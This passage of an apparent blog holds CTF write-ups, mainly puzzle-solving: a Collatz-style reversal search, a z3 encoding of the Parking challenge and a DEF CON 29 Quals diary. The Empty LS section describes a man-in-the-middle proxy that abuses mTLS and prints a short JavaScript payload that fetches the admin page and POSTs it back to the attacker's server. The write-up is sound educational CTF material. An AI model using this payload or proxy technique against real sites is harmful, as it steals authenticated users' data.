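        n //= 6
        length += 1
    return length
```

The starting value 93571393692802302 has 22 base-6 digits, which matches the length of the two output strings and stays under the limit of 24.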

It was very lucky that my teammates figured this out at the end, because I didn’t. I was on a path of no return: I tried to find the answer by searching.

The following is a record of what I did during the CTF. You will see that I was extremely close to the answer, both in my result and in my method.

Reversible Function

So the step() function may not have a one-to-one relationship, but it’s definitely reversible.

First, we can determine that both lists have the same length, and that there are no 0s at the end of both lists, because they are stripped away. The problem is how many 0s we should append, because there could be infinitely many such 0s that were stripped away. Let’s not worry about that yet and continue the analysis.

The SBOX is easily reversible because it obviously is a one-to-one mapping, so we can build a reverse mapping to convert the lists back.

Notice this line l1.append(0), meaning l1 should have a 0 at the end. However, if we don’t have a 0 at the end of l1, then there must have been another 0 at the end of l2. So, we have something like this

if l1[-1] != 0:
    l1.append(0)
    l2.append(0)
l1.pop() # correspond to l1.append(0)

Here we only append one 0 to the end of each list. Why only one? Notice that if we appended more than one zero, the list could not be the result of a single step(), as the trailing 0s are trimmed at the end of each step().

Then, for the final case, there are two possibilities: one is that the original l1 begins with a 0, the other is that l1 begins with a 1 and the resulting l2 begins with a 1. So we have

# possibility 1
ori_l1, ori_l2 = [0] + l1, l2     # correspond to l1.pop(0)

# possibility 2
if l2[0] == 1 and l1[0] == 1:
    ori_l1, ori_l2 = l1, l2[1:]   # correspond to l2.insert(0, 1)

Taken together, we have the reverse function as:

def reverse_step(l1, l2):
    if not l1 or not l2 or l1[-1] == l2[-1] == 0:
        return
    
    for i in range(len(l1)):
        l1[i], l2[i] = RBOX[(l1[i], l2[i])]
    
    if l1[-1] == 0:
        l1.pop()
    else:
        l2.append(0)
    
    ret = [[0] + l1, l2]
    if l2[0] == 1 and l1 and l1[0] == 1:
        ret.append([l1, l2[1:]])
    return ret

Where RBOX is the reverse of SBOX.
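
As a minimal sketch of how such a reverse table could be built: the SBOX below is a made-up placeholder permutation over (l1, l2) digit pairs, not the table from the challenge, and it is only there to show the inversion.

```python
# Hypothetical placeholder S-box: maps a (l1_digit, l2_digit) pair to another
# pair. The real table comes from the challenge source, not from this sketch.
SBOX = {
    (0, 0): (0, 0),
    (0, 1): (1, 0),
    (0, 2): (0, 1),
    (1, 0): (1, 1),
    (1, 1): (0, 2),
    (1, 2): (1, 2),
}

# A one-to-one mapping has as many distinct outputs as it has inputs.
assert len(set(SBOX.values())) == len(SBOX)

# Swap keys and values to obtain the reverse mapping.
RBOX = {out: inp for inp, out in SBOX.items()}
```

With a table like this, RBOX[SBOX[pair]] gives back the original pair, which is what the loop in reverse_step relies on.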

Search

So our search space is an incomplete binary tree (which I later found out is called the Collatz graph). However, for a search depth of more than 2000, there could be as many as $2^{2000}$ states, and even if we consider that most of the branches are single links most of the time, the search space is still far too large for simple algorithms like breadth-first search, so it’s a no-go.

Depth-first search seems like a good idea. However, the list length is limited to 23, meaning that our DFS really is an IDDFS, and that it performs no better than BFS in this case. So we have to turn to something else. By the way, the longest path problem is a known NP-hard problem, although I’m not quite sure if this really is a longest path problem.

After trying a lot of things, I finally settled on a heuristic priority-based parallelized searching algorithm with exploration. I know that sounds like a lot, but let me explain.

Heuristic

The easiest one to consider, which I tried first, is to simply rely on the count (stopping time): whichever node has the largest count gets searched first. That quickly turned out to be really bad, because the search would get stuck on some leaves of a branch in the tree that has no chance to grow bigger because of the length limitation.

Then I tried a lot of different functions based on count and another parameter, the length of the list (upper bound of the number). I intuitively thought that it must be better if we can get a sufficiently large count with small length, meaning it has much more potential to spread out without reaching the length limit.

A few things I tried:

\[\frac{\text{count}^{k_1}}{\text{length}^{k_2}}\]
\[\max\left(k_1 \frac{\text{count}}{2000}, k_2 \frac{\text{length}}{23}\right)\]
\[\log\text{count} \cdot \left(1-\frac{\text{length}}{23}\right)\]
\[k_1 \frac{\text{count}}{2000} - k_2 \frac{\text{length}}{23}\]

where $k_1$ and $k_2$ are weights that I tweaked by hand. All of them worked pretty well with manual tweaking. However, they all stalled at a count of about 1300, which is still far from what we need.
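
For reference, here is a minimal Python sketch of the four scoring functions above. The function names are mine, and 2000 and 23 are simply the normalizing constants that appear in the formulas; the weights are left as parameters since I only ever tuned them by hand.

```python
import math

MAX_COUNT = 2000   # normalizing constant for count, as in the formulas
MAX_LENGTH = 23    # list length limit, as in the formulas

def ratio(count, length, k1, k2):
    """count^k1 / length^k2"""
    return count ** k1 / length ** k2

def weighted_max(count, length, k1, k2):
    """max(k1 * count / 2000, k2 * length / 23)"""
    return max(k1 * count / MAX_COUNT, k2 * length / MAX_LENGTH)

def log_scaled(count, length):
    """log(count) * (1 - length / 23)"""
    return math.log(count) * (1 - length / MAX_LENGTH)

def linear(count, length, k1, k2):
    """k1 * count / 2000 - k2 * length / 23"""
    return k1 * count / MAX_COUNT - k2 * length / MAX_LENGTH
```

For example, with equal weights the linear score prefers a node with count 1300 and length 10 over one with the same count and length 20, which matches the intuition that shorter lists have more room to grow.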

Exploration

Thinking that the heuristic is not good enough, I also added an exploration factor $1 > p \gg 0$ into the game. Every time a new node is selected, the program will have a probability of $p$ to choose the top of the priority queue (i.e. with the largest heuristic), and a slight $1-p$ chance to choose something in the middle of the queue.

This exploration part is there in the hope that, by some chance, the program will bump into the correct node which would lead us to victory. This “optimization” supposedly shouldn’t have a big impact on the overall dynamics of the search, but it is a way to improve the search anyhow.
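
The selection rule can be sketched roughly like this in Python. This is not my actual Go code: the node representation (count, length), the scoring function, and the choice of the exact middle element are assumptions made for illustration, and a real implementation would use a heap instead of re-sorting a list.

```python
import random

def score(node, k1=1.0, k2=1.0):
    """Linear heuristic from above; node is a (count, length) pair."""
    count, length = node
    return k1 * count / 2000 - k2 * length / 23

def select(nodes, p, rng):
    """Pop the next node to expand from a non-empty list of nodes.

    With probability p take the best-scoring node, otherwise take the
    node sitting in the middle of the ranking (the exploration step).
    """
    nodes.sort(key=score, reverse=True)
    index = 0 if rng.random() < p else len(nodes) // 2
    return nodes.pop(index)
```

Setting p close to 1 keeps the search mostly greedy, while the occasional pick from the middle gives neglected branches a chance to be expanded.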

Parallelization

Now it’s time for multithreaded computing. This is actually pretty easy to code with Go’s built-in goroutines and sync.Cond. All I need is to boot up some worker goroutines and use sync.Cond to notify the workers each time a new node is found. I left it running for some time, and restarted it whenever it was stuck for more than 5 minutes, hoping the above exploration mechanism would work. It did do some magic, though, as I was able to get lists with a large count.

The count eventually stopped increasing beyond 1636, and this is what I got at the end:

l1 = [0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0]
l2 = [0, 1, 0, 0, 0, 1, 0, 1, 1, 2, 2, 1, 1, 0, 2, 2, 1, 0, 0, 0, 2, 0, 2]

During the search, in order to record the states, I had already turned them into base-6 numbers, but I never printed them out to see what was going on. What a sad story.

The code I wrote is over here, very messy: number (gist).

PARKING

I didn’t actually solve this challenge during the match—my teammate did—but I did look into the question and found it pretty interesting. After the competition I tried to solve it myself. I think I found a “partially non-intended” way of solving this problem.

So this is a challenge that is marked as hardware, because the map level2 actually works like a circuit, where you can clearly identify the usual AND, OR and NOT gates. The intended way, which my teammate took in the end, is to extract the circuit and solve it using a Boolean satisfiability solver like the famous Z3. A write-up that tells you how to do it was nicely written by User1@osogi from team s3qu3nc3, take a look!

However, with a closer inspection of the game level, I realized that even if we ignore the space taken away by other blocks, there is only a small number of moves each block can do. For example:

This is a region that contains a lot of blocks, but let’s only focus on one block and take away all the others. Now you can slide that block freely up and down (or left and right if the block lies horizontally). But no matter which block you choose, because of the rugged path, there are not many places it can go. Using this observation, we can set up the variables in such a way that the z3 solver can do the whole job for us.

For the following, $(x, y, w, h)$ is a non-wall block that has its upper-left corner at position $(x,y)$ with dimensions $(w, h)$, with an implicit requirement that $w = 1 \lor h=1$.

Variables

First thing to do is to turn the wall blocks into a boolean matrix $M$ of dimension $(\text{width}, \text{height})$, where $M_{x, y}$ is true if the position $(x,y)$ is covered by a wall block, and false otherwise.

Currently if you were to check if a block $(x, y, w, h)$ intersects with a wall or not, you’d have to spend $O(n)$ time every time, where $n$ is the number of wall blocks given. However, using $M$, it only takes $O(w\cdot h)$ time to do the check, which is much more efficient.

To further compress the space usage, we can use a 1-D bit-vector $S$ of size $\text{width}\cdot \text{height}$ for this, where $S_{x\cdot \text{height}+y} = M_{x, y}$.

With the help of this, we can quickly calculate all possible moves for each block, by sliding it up and down or left and right step by step until it hits a wall. We represent each move as an integer $i$, where a positive value means the block can move down or right by $i$ steps, a negative value means the block can move up or left by $-i$ steps, and zero means that the block can stay where it was at the beginning. Notice that all the blocks have zeros in their move set $D(b)$ (action domain), except for the red block, because the red block has to be moved at least by one step.
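
A minimal Python sketch of this step follows. It is not the code from my exploit: it assumes walls are given as individual cells, uses a Python integer as the bit-vector $S$, treats any block with $h = 1$ as horizontal, and always includes 0 in the move set (so the special case of the red block is ignored).

```python
def wall_bits(walls, height):
    """Pack wall cells (x, y) into an int used as a bit-vector S,
    where bit x * height + y is set when (x, y) is a wall."""
    s = 0
    for x, y in walls:
        s |= 1 << (x * height + y)
    return s

def is_free(s, width, height, x, y, w, h):
    """True if the block (x, y, w, h) is on the board and hits no wall."""
    if x < 0 or y < 0 or x + w > width or y + h > height:
        return False
    for i in range(x, x + w):
        for j in range(y, y + h):
            if (s >> (i * height + j)) & 1:
                return False
    return True

def move_set(s, width, height, block):
    """Slide the block step by step in both directions until it is blocked."""
    x, y, w, h = block
    dx, dy = (1, 0) if h == 1 else (0, 1)   # horizontal vs. vertical block
    moves = [0]
    for sign in (-1, 1):
        step = sign
        while is_free(s, width, height, x + step * dx, y + step * dy, w, h):
            moves.append(step)
            step += sign
    return sorted(moves)
```

Each membership check costs $O(w \cdot h)$ bit tests, independent of how many wall blocks there are.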

For example,

\[D(\text{red}) = \{-1, 0, 1, 2\}\\ D(\text{blue}) = \{-3, -2, -1, 0\}\\ D(\text{green}) = \{-1, 0\}\]

There are 320,768 non-wall blocks in total, and 1,002,421 possible movements for all blocks (stay at the original location also counts as one move), meaning that on average a block has 3.12 possible moves.

Notice that with each move, we “generated” a new block that could potentially exist on the final state of the board. If we have a block $b_i = (x, y, w, 1)$ and $D(b_i)=\{-1, 0\}$, on the final state of the board, there is a possibility that either $b_{i,0} = (x, y, w, 1)$ exists on the board, or $b_{i, -1} = (x-1, y, w, 1)$ exists on the board. Then, we can turn each of these indicators into boolean values, where $b_{i,0}$ is true represents that $b_{i,0}$ exists on the final state of the board, and false otherwise, so on and so forth.

I’ll abuse the notation a bit, so that a block symbol is a four-tuple and a bool value at the same time.

The given code encodes the final state $s_i$ of the green block $i$ as a single bit into the flag string, where the bit is a 0 if the block is not moved, and 1 if it is moved, which means it nicely converts to our representation, where $s_i = \neg b_{i, 0}$.

Constraints

First obvious constraint we need to set up is that

\[\forall b_i,\bigvee_{j\in D(b_i)} b_{i,j}\]

In plain English, this means that for every non-wall block on the board, one of its available “moved” versions must exist on the board, because a block cannot be taken off the board.

Then, we have the constraint that each space $(i, j)$ on the board can be occupied by at most one block. Therefore, if we have two blocks, $a$ and $b$, that intersect with each other, then it must be that $a \implies \neg b$ (abusing notation again). Notice that this automatically implies $b \implies \neg a$, which means that we need only add one of them to the constraints.

To build these constraints, we need to find all intersections, and finding them in the naive $O(n^2)$ way will not do, because $n \approx 10^6$ is too large for this. Notice that the actual number of intersections is far smaller than $n^2 \approx 10^{12}$, because a block can only intersect with nearby blocks. Hence, the optimization we can do is to pre-calculate the spaces each block occupies, and then for each space, add the constraint that only one block can occupy that space. The pseudo-code looks like this:

S := Map[(x, y) -> Set[Block]]

FOR b IN blocks
  FOR (i, j) that b covers
    add b to set S[i, j]
  END
END

FOR (i, j) in S
  FOR b_1 in S[i, j]
    FOR b_2 in S[i, j] \ {b_1}
      add constraint (b_1 => !b_2)
    END
  END
END
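
The same idea as a runnable Python sketch, without the solver: it only produces the clauses, which could then be handed to z3. The data layout (dictionaries keyed by a block name, variables as (name, move) pairs) is an assumption for illustration, and unlike the pseudo-code it emits each unordered pair only once.

```python
from itertools import combinations

def cells(block):
    """All board cells covered by a block (x, y, w, h)."""
    x, y, w, h = block
    return [(i, j) for i in range(x, x + w) for j in range(y, y + h)]

def build_constraints(blocks, domains):
    """blocks: {name: (x, y, w, h)}, domains: {name: [allowed moves]}.

    Returns (at_least_one, exclusions): at_least_one holds one list of
    variables per block (their disjunction must be true), and exclusions
    holds pairs (a, b) meaning a => not b.
    """
    at_least_one = []
    occupancy = {}   # cell -> set of moved-block variables covering it
    for name, (x, y, w, h) in blocks.items():
        dx, dy = (1, 0) if h == 1 else (0, 1)
        variants = []
        for move in domains[name]:
            var = (name, move)
            variants.append(var)
            moved = (x + move * dx, y + move * dy, w, h)
            for cell in cells(moved):
                occupancy.setdefault(cell, set()).add(var)
        at_least_one.append(variants)

    exclusions = set()
    for covering in occupancy.values():
        # One implication per unordered pair is enough.
        for a, b in combinations(sorted(covering), 2):
            exclusions.add((a, b))
    return at_least_one, exclusions
```

Because the work is done per cell, the cost depends on how many moved blocks share a cell rather than on the total number of block pairs.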

That’s it. Notice that we didn’t add a constraint that limits each block to exactly one moved version on the board, which means the solver could in principle set two disjoint versions of the same block to true at the end (something like both $b_{i, -2}$ and $b_{i, 2}$ being true). However, that won’t affect our final answer, as a block taking two places is very unlikely to happen because of how tight the spaces are.

Finally we have in total 3,288,449 constraints and 1,002,421 variables, and it took z3 about 3 minutes to solve on my computer. The exploit can be found over here: Parking, Google CTF 2021.

EMPTY LS

Although I’m one of the web gangs, because there are too many interesting tasks this time, I didn’t even look at any of the web challenges. Empty LS is an exception because I heard the solution while my teammates talked about it. I think it’s a pretty creative challenge, so I want to write the solution here as well.

The challenge revolves around two domains, one is https://www.zone443.dev, a website to register accounts and custom sub-domains, and https://admin.zone443.dev, an “admin portal” and supposedly where we should get the flag.

The credential authentication for this website is unusual because it does not use the traditional username/password or cookies, but instead a process called mTLS, which stands for Mutual TLS. Basically what that means is that when connecting to a server, the client also presents a certificate that can achieve two things:

Validate the identity of the client, and
Use the certificate to encrypt the communication.

Unlike cookies or password, it is quite hard to steal the identity of the client using mTLS, because the private key is kept safe and the only way to get it is to somehow take control over the client’s machine. However, the client’s using the latest headless Chrome, so no more Chrome 0-days for us. Also there might be some vulnerabilities in the mTLS implementation, but since this is a web challenge not a crypto one, that possibility is also highly unlikely.

Observations

A few important observations are made:

1. https://admin.zone443.dev is behind a server that doesn’t validate the Server Name Indication in the TLS Client Hello or the Host field in the HTTP request; it only uses the client certificate for application-level credential purposes;
2. https://admin.zone443.dev is using a wildcard certificate with Subject Alternative Name including host *.zone443.dev;
3. We have total control over the sub-domain we applied for, including applying for a valid TLS certificate; and
4. By filling out a sub-domain address in the feedback form, a headless Chrome will request our sub-domain with the admin’s certificate.

Combining 1 and 2, we realized that any TLS requests will be accepted by the server. And using 3 and 4, it is possible to obtain a copy of admin’s TLS handshake and the following communication.

There are some other hints that the challenge gives, which is when you try to access admin.zone443.dev with your own client certificate that you applied for, a message will tell you that you are not authorized. Therefore, it must be that only when we access the website with the admin’s client cert, we shall get the flag.

There is clearly some Man-in-the-Middle attack going on. A replay attack won’t work as the TLS’s cipher key is generated randomly each time. However, notice that the website is accessed using a headless Chrome, meaning that it should also be executing anything ranging from iframe to script on our controlled sub-domain.

Exploit

Embedding a JavaScript that fetches the content of admin.zone443.dev on our controlled site using the admin’s cert seems to be a good idea, but it is impossible to steal the content because of the Cross-Origin Resource Sharing policy. However, CORS enforces this by checking the domain name on the client side. Is there a way to circumvent this protection?

This is a scenario that is much like DNS rebinding, where we have to trick the client into thinking it’s accessing the same domain name, so that CORS does not kick in, while in fact it’s using its credentials on another website.

Notice that we have control over the entire sub-domain, and that the admin. site validates neither SNI nor Host, meaning we can set up a proxy in the back-end that forwards anything sent from the client to admin.zone443.dev:443 and back. Although we aren’t able to intercept anything of the actual communication because of TLS encryption, we can acquire the content in the front-end and send the data back to ourselves.

That means we can first make the admin access our controlled sub-domain https://xxx.zone443.dev/, so that it will execute a JavaScript payload on our website. The payload looks something like this:

fetch(new Request('/')).then(resp => resp.text()).then(body => {
    return fetch(new Request('/', {
        method: "POST",
        body: body,
    }));
});

This script will try to fetch the content on the same domain name https://xxx.zone443.dev/, but as we set up a proxy already, the request is actually sent over to admin.zone443.dev:443 and back. Then the acquired content will be sent back to our server via a POST request, where we will be able to see what the admin. site looks like from the admin’s side.

In the actual payload, we keep track of the TCP connections made, so on the first and third connections, we use our own TLS cert and server to handle the request, but on the second one, we redirect the traffic to admin. so that the content can be stolen. Notice that this is not as time-sensitive as a normal DNS rebinding would be, as there is no “caching” mechanism for TLS connections. Although HTTP/2 multiplexing could potentially affect the result, I didn’t really encounter that in my exploit, and it can be easily mitigated by closing the connection on the server side.
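
The connection-counting idea can be sketched in Python as follows. My actual exploit is written in Go, so this is only an illustration: LOCAL_ADDR is a hypothetical address for our own TLS server, and the listener/accept loop is left out. The relay never looks inside the bytes, which is why the TLS session between Chrome and admin. stays intact.

```python
import socket
import threading

ADMIN_ADDR = ("admin.zone443.dev", 443)   # target named in the write-up
LOCAL_ADDR = ("127.0.0.1", 8443)          # hypothetical: our own TLS server

def choose_backend(conn_index):
    """Map the 1-based index of an accepted TCP connection to a backend:
    the 2nd connection goes to admin., the others to our own server."""
    return ADMIN_ADDR if conn_index == 2 else LOCAL_ADDR

def pipe(src, dst):
    """Copy raw bytes from src to dst until src reaches end of stream."""
    while True:
        data = src.recv(4096)
        if not data:
            break
        dst.sendall(data)
    try:
        dst.shutdown(socket.SHUT_WR)   # propagate the end of stream
    except OSError:
        pass                           # peer is already gone

def relay(client, backend):
    """Shuttle bytes in both directions between two connected sockets."""
    back = threading.Thread(target=pipe, args=(backend, client), daemon=True)
    back.start()
    pipe(client, backend)
    back.join()
```

An accept loop would then count incoming connections, open a socket to choose_backend(n), and hand both sockets to relay in a new thread.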

The exploit is easy to write with the help of Go’s built-in tls and http packages.

The exploit is over here EMPTY LS, Google CTF 2021. It is not host dependent, so you can simply run it without changing anything (other than to put X.509 cert/key pair in the right place).

My First CTF Experience

2021-05-04T10:30:00-04:00

I was one of the Tea Deliverers at DEF CON 29 CTF Quals.

I had the luck to play in this famous CTF event with some of the best hackers out there, and I definitely couldn’t miss this opportunity even though it’s a 5-day vacation here in China for the International Workers’ Day.

This is NOT a write-up NOR a blog for a general viewer, but merely a record of what I did and what I thought about this first ever CTF I’ve done.

0x00

I honestly had no idea who I was going to work with before the event. I was simply asked by my supervisor during my internship at Chaitin if I wanted to be in a CTF team, and I said yes. I was then connected to @zTrix, the CTO of the company, and later joined a team called Tea Deliverers, which is obviously one of the best CTF teams in the entire world.

Fun fact, the company founders got to know each other at CTF events, and they founded this security company together because of their experiences as teammates.

I signed myself up as one of the “web gangs,” and told the group leader I was probably good at XSS (although I have probably done more binary reversing than XSS, and I’m good at neither). Spoiler alert: I only later found out that there were practically no web questions in this CTF, sad.

We had a fancy dinner the eve before the match at a seafood/hotpot/BBQ buffet place, which is pretty notable cause who doesn’t like free food.

The competition starts at 8 AM China local time, and lasts for 48 hours non-stop, so I better get some good sleep.

Day 1

I arrived at our “base,” which is just an office room in the company, slightly after the release of the first challenge, say-hellooo.

say-hellooo

8:00 AM

This challenge simply asks to call the event host @Zardus and ask for the flag. Finding the phone number was rather easy, by going to the host’s twitter, where he links his personal website, and where his CV can be found. On his CV there’s his phone number. I called over and after some chitchat, he said that the flag is “hellospacehackers, all lower case.” And…… it’s not correct.

But of course it was correct, only I was too stupid to realize that when he said “space” he meant a whitespace character instead of the word. After being reminded by my teammate, I got the first flag for the team, and spoiler alert, my only flag during the event.

baby-a-fallen-lap-ray

8:05 AM

Although I didn’t sign up for pwn questions, and I had practically no pwn experience other than some basic stack overflow knowledge, I still took a look at the challenge and tried to find out what it was about, since it was the only challenge released at the time.

Inside the package there is one executable in ELF format called manchester, which is the entry point to the service, a few binaries that start with the magic header sephiALD, and a mysterious file p that contains the strings of the menu shown when we connect to the server.

There was one link pointing to the source code of a challenge from the previous year’s DEF CON Finals, and it was seemingly the same thing, where manchester is actually an implementation of a Manchester dataflow machine. I thought that someone must have written a disassembler since this question came from a previous year, but I couldn’t find any. So I thought it might be a good idea to start by writing a disassembler based on the assmbler.py provided.

At first it was easy to build an unpacker and disassembler, but it was a bit confusing to turn the raw operations into the form of a .tass file, mainly because I couldn’t figure out how the arguments work. One teammate who had read the paper walked me through how parallelism and dataflow work in this machine, and I was able to get a grasp of the idea. Yet recovering the assembled binary back into human-readable .tass might still have been too much for me.

Teammates who were reversing this told me that the opcodes and some internal structures had been switched around, but they were able to quickly figure out what the new opcodes were and updated the table. They also figured out that the mysterious file p was run by the vm, and vm was run by manchester, so figuring out how manchester works was only the first step, and we still had to reverse vm and then reverse p and pwn p.

Noticed that there was a graphing function to draw a dataflow of the program. With my current disassembler I could use that function to draw out a graph. However it was simply way too large and makes no sense at all.

Unfortunately I had no other good way to continue with this problem, so I handed my code over to my teammates and worked on other problems.

nooombers

11:30 AM

I took a look at the challenge while doing baby-a-fallen-lap-ray, and people somehow just miraculously figured out what each operation meant. After some conversation I still didn’t get how they managed to figure that out, probably by comparing it against common signature algorithms, or just eyeballing. I didn’t know what was happening, so I left the challenge.

exploit-for-dummies

4:40 PM

Trivia, but definitely not trivial. The trivia part was rather easy: there were only 25 questions and you didn’t need to get all of them right in order to pass the 5000 score mark. The flag was read into memory, but at a random mmapped location with a random offset. These two addresses were erased from the stack, but there was one number that equaled the offset XORed with some random numbers that were stored both on the stack and on the heap.

If we managed to crash the program, the front-end would spin up a gdb, and we could input an address that starts with 0x and gdb would print out the string located at that address. Nonetheless, it was definitely impossible to plainly guess where the string was stored.

My first intuition was that there might be some exploits in that version of gdb, and we could write something using the save mechanism of the trivia game to pwn gdb. After some discussion with my teammates, we all agreed that we should focus on gdb because there did not seem to be any bugs in the trivia game other than the file handle close crash.

After playing with gdb for a while, I was able to get the address of the aforementioned number using the 0x0+environ trick. However, I got stuck because there was seemingly nothing more I could do. Writing to the core file was not an option, as a crash would simply overwrite it.

Teammates found out some files that gdb would go and read, including iofclose.c, .gdb_history, and trivia.debug. But weirdly all of us couldn’t figure out how this relates to shellcoding. I unfortunately lost interest in this challenge, so I went on with the new challenges.

rick

10:00 PM

Two hours after the release of the problem, my teammates had made no significant progress. I jumped in to see where we were at.

Level 1

I opened the OpenGL game, and there was one big building, a lever and a strange black cube that fell into the ground, with “Level 1” written on the corner of the program window. I played around and figured out the basic controls. I peeked into the door crack and saw there’s a yellow lever inside, so it must be that we need to enter the building.

Having wireshark running in the background, I also saw that the game connected to the server when it started but sent nothing to it. The server would automatically disconnect with KO after 15 seconds.

Still, didn’t want to touch Ghidra and IDA, I used scanmem to try to find the variables that controlled the player coordinates. However I was not able to find the exact variable, and I could only filter down to ~50 locations in memory. Setting them all at once apparently breaks the game.

One of my teammates was pretty smart and pointed out that we could just look at the cross-references to gluLookAt, since it calculates the transformation matrix for the camera. Indeed I found six helper functions that get the eye coordinates and the look vector. Using gdb to set the values was way too much of a hassle, so I wrote a frida script that intercepts one of the functions, then prints and changes the values at will.

Teleported into the building just to see a giant rick roll (which is what I anticipated seeing rick as the title of the challenge). The image had Rick Astley saying “Don’t Cheat,” and apparently teleporting was not an option. Somehow I thought it might be that the clue is hidden in the textures, that if you manage to open the door without cheating another image would appear. So I dumped all the textures just to find nothing there.

Then some teammates figured out that the ‘E’ key does something, by back-tracing from the call to send, and observed that some conditions needed to be met in order to enter the function that sends something to the server. I simply hooked that function to make it always return 1, and whoosh, the door opened, with the lever and block outside turning white, but nothing else happened.

Further reversing of the function revealed that it goes through all the levers in the map and checks if the player is in the bounding box of something, returning 1 if so. However, the function also did some other things, so simply hooking it would not do. I therefore hooked the actual low-level checking function instead. And boom, I was in level 2.

Level 2~9

Didn’t know what happened, but wireshark told me that an interaction with the server had taken place. It was not too long after that that we finally figured out that you can simply press ‘E’ on the levers to trigger them. Having been a gamer for so long and not realizing that, I was disappointed in myself.

I was able to manually fly through the first 6 levels as a gaming boi within 15 seconds each, but starting from level 7 there were too many levers to do manually. So I wrote a script to automate the process, with hardcoded levers to press.

Level 10

And then I arrived at level 10, where I realized that the logic is random each time you play it. Because of my lack of experience, I thought that this must be the final level, since it was different from the rest.

Still not wanting to do much work because I was pretty tired at that time, I figured out one combination of levers that would pass level 10, and just left my script running, hoping that by randomization this combination would sooner or later work again.

And indeed it worked, only that I was met by level 11.

Level 11~37

Okay, it’s time to fuzz, I thought. While others were still reversing the protocol, I started to write my algorithm to automatically switch the levers at random and see if the door opens. I first let each lever have a certain probability $p$ of being on, but that did not work well and only got me through the first 17 levels. Later, by observation, I realized that only the lower-indexed levers were constantly being switched and not the higher-indexed ones. Then I realized that since each function only detects the lever once, the levers do not have an equal probability of being switched; the switched lever rather follows a geometric distribution.
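
To make the skew concrete, here is a small Python sketch under my reading of the situation, which is an assumption: the hooked check walks the levers in index order, reports a hit with probability $p$ at each one, and stops at the first hit. Under that model the chance that lever $k$ (1-based) is the one switched is $(1-p)^{k-1}p$.

```python
def hit_probability(p, k):
    """Probability that the k-th lever (1-based) is the first one hit,
    assuming independent checks in index order with hit probability p."""
    return (1 - p) ** (k - 1) * p

# Example values for p = 0.5: each further lever is half as likely.
first_five = [hit_probability(0.5, k) for k in range(1, 6)]
```

With $p = 0.5$ the tenth lever is already hit less than once in a thousand tries, which would explain why the higher-indexed levers almost never moved.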

I tried a lot of ways to fix this, including generating a random number whose bits represent the on/off state of the levers, and giving each lever a different Bernoulli distribution to see how it goes. Finally I settled on recording the index of the last lever pulled, to make sure that each lever has the chance of being pulled at least once, and checking the state of the final gate to make sure we get to the next level as soon as we have an acceptable answer. I also played around with different probability distributions, because apparently some levels require a lot of levers to be pulled and some require fewer.

I also optimized a lot of other things. At first I teleported around to press the levers, only to realize that was pretty inefficient. Later I simply held ‘E’ down all the time and made the function return true at my intended lever index, by keeping an internal counter. I also hooked glutSetTimer to set its arguments to 0, so each refresh is way quicker and a lot more trials can be done within 15 minutes.

Level 37~100

I was able to get to the 37th level, but no further progress could be made by fuzzing. I kind of already knew that this should be solved with a CSP or BSP solver, because LiveOverflow once did a challenge that was pretty similar to this. In the meantime, my teammates finally reversed the protocol and realized that it is simply a tree structure that goes from the levers to the final gate. So all they had to do was write the exploit.

At 6:45 AM the second day, we got the flag.

Day 2

There were still no web questions released, so I took a look at various questions.

pza999

6:50 AM

Downloaded the package, just to realize there’s another QEMU VM kernel image. Had no idea what to do.

segnalooo

7:00 AM

Another pwn. The reversing part seemed straightforward, and the input seemed to take a hex number. I tried “0000” locally and it went through to the next line of output, but when I tried the same on the server it said “invalid hex,” and wouldn’t let me proceed. Again, I didn’t know what to do next.

After less than 3 hours of sleep, I woke up from a camp bed at 9:30 AM, and jumped back to work.

coooinbase

9:40 AM

src is actually a .gz file. After decompression there were a .html file for the front end, a .rb file for the backend, and a .sh file that runs the QEMU VM. The front end takes input and feeds it into the Ruby backend; the backend checks some conditions on the input, encodes it as bson→base64, and feeds it into the virtual machine. However, I had no idea how to statically analyze the kernel image (it’s not an ELF), and I’m not a pwn technician, so I really couldn’t help here.

smart-cryptooo

10:30 AM

Challenge was tagged machine learning and easy, which seemed suitable for a noob like me. I trained the model for some time and was able to encrypt and decrypt custom messages successfully. The file name indicated that the original text was from philosophy.html on OOO’s website. Certainly there was more to it.

After taking a look at the python file, it was pretty easy to figure out the entire encryption and decryption process, and how the models are trained. The default message and key size are 64 bits, where one bit is actually a float64 number, and we’ll use these numbers from now on.

Alice and encryption

Alice is a 4-layer model that encrypts a message with a key. It takes in a plain text message (1×64 vector) and a key (1×64 vector), and outputs the encrypted message (1×64 vector). The encryption procedure of an entire text goes like this:

First split the text into 8-byte messages, padding the end with spaces. Each 8-byte message is then converted into a big-endian 64-bit number, and then into a 1×64 feature vector, where one bit corresponds to one feature: if the bit is a 1, the feature is a -1, otherwise the feature is a 1. Every 16 (bunch_size) messages are grouped into a bunch and encrypted using the same key, by putting these 16 messages alongside the key into the Alice model. A random 8-byte (64-bit) key is also generated to encrypt the next bunch of messages. This randomly generated key is encrypted with the current key and appended to the current bunch of encrypted messages.
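
The text-to-feature conversion can be sketched in Python like this. It is my reconstruction rather than the challenge’s code: the function names are made up, ASCII input is assumed, and the order of the bits inside the vector (most significant bit first) is a guess.

```python
def text_to_features(text):
    """Split text into 8-byte messages and map each bit to a +1/-1 feature."""
    data = text.encode("ascii")
    if len(data) % 8:
        data += b" " * (8 - len(data) % 8)       # pad the end with spaces
    vectors = []
    for i in range(0, len(data), 8):
        number = int.from_bytes(data[i:i + 8], "big")
        # Assumed bit order: most significant bit first.
        bits = [(number >> (63 - j)) & 1 for j in range(64)]
        vectors.append([-1.0 if bit else 1.0 for bit in bits])
    return vectors

def features_to_text(vectors):
    """Inverse mapping: a negative feature is a 1 bit, otherwise a 0 bit."""
    out = bytearray()
    for vector in vectors:
        number = 0
        for feature in vector:
            number = (number << 1) | (1 if feature < 0 else 0)
        out += number.to_bytes(8, "big")
    return out.decode("ascii")
```

Grouping every 16 of these vectors into a bunch and feeding them to the model together with the key vector is then a matter of slicing the returned list.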

Bob and decryption

The Bob model has exactly the same structure as Alice. The only difference is that it takes in an encrypted message and the key that was used to encrypt it, and outputs the decrypted message. The decryption procedure is the reverse of the above procedure using the Bob model, nothing special.

The magic Eve

How do we prevent the models from just being lazy and not encrypting at all? That’s where the Eve model steps in. Eve is identical to the Alice and Bob models, except that it has a new input layer before the original input layer, which takes in only the encrypted message and is densely connected to the original input layer. Now we define the loss of the Eve model as the absolute difference between the output of the Eve model and the corresponding plain message, meaning that if we could train the Eve model to have a small loss, we would be “breaking” the encryption.

ABE model

